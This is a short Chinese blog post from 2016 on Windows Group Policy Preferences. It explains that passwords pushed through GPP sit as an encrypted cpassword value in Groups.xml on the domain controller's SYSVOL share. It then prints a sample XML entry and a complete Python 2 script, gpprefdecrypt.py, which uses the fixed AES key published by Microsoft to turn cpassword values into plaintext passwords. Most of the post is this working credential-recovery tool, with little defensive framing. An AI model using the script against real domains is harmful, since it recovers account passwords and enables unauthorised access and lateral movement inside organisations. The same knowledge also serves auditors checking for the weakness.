

组策略首选项(Group Policy Preference, GPP)借助组策略对象(Group Policy Object, GPO)实现了对域中所有资源的管理。

通过GPP发布的账户信息全部存储在\[Domain Controller]\SYSVOL[Domain]\Policies中。其中的Groups.xml文件中就有cpassword的哈希值。有关字段的具体内容大致如下:

<Properties action=”U” userDSN=”0” dsn=”test” driver=”SQL Server” description=”test data source”username=”testusername” cpassword=”AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7OltPD8tLk”/>


# Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
# This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.

import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
  print "Usage: gpprefdecrypt.py <cpassword>"

# Init the key
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = """
4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')

# Add padding to the base64 string and decode it
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(sys.argv[1]) % 4) % 4)
password = b64decode(cpassword)

# Decrypt the password
o = AES.new(key, AES.MODE_CBC).decrypt(password)

# Print it
print o[:-ord(o[-1])].decode('utf16')

引用: http://pastebin.com/TE3fvhEh



posted @ 2016-04-20 14:17  k2ng  阅读(1884)  评论(0编辑  收藏  举报